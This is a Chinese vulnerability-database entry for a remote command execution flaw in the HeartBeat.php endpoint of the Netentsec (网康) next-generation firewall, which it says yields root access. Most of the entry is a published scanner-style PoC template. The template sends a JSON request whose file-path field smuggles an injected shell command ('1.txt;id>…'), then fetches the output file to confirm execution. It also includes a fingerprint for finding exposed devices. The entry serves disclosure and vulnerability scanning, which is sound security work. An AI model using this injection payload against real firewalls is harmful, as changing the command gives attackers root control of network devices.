netentsec-fiewall-heartbeat-php-rce: 网康 下一代防火墙 HeartBeat.php 远程命令执行

日期: 2025-09-01 | 影响软件: 网康 下一代防火墙 | POC: 已公开

漏洞描述

网康 下一代防火墙 HeartBeat.php文件存在远程命令执行漏洞,攻击者通过构造请求包即可获取服务器Root权限 app="网康科技-下一代防火墙"

PoC代码[已公开]

id: netentsec-fiewall-heartbeat-php-rce

info:
  name: 网康 下一代防火墙 HeartBeat.php 远程命令执行
  author: zan8in
  severity: high
  verified: false
  description: |
    网康 下一代防火墙 HeartBeat.php文件存在远程命令执行漏洞,攻击者通过构造请求包即可获取服务器Root权限
    app="网康科技-下一代防火墙"
  tags: netentsec,rce,网康,firewall
  created: 2025/03/19

set:
  randstr: randomLowercase(6)
rules:
  r0:
    request:
      method: POST
      path: /directdata/direct/router
      headers:
        Content-Type: application/json
      body: |
        {"action":"NS_Rpc_HeartBeat","method":"delTestFile","data": ["/var/www/tmp/1.txt;id>{{randstr}}.txt"],"type":"rpc","tid":11,"f8839p7rqtj":"="}
    expression: response.status == 200 && response.body.bcontains(b'"action":') && response.body.bcontains(b'"NS_Rpc_HeartBeat"')
  r1:
    request:
      method: GET
      path: /{{randstr}}.txt
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()

相关漏洞推荐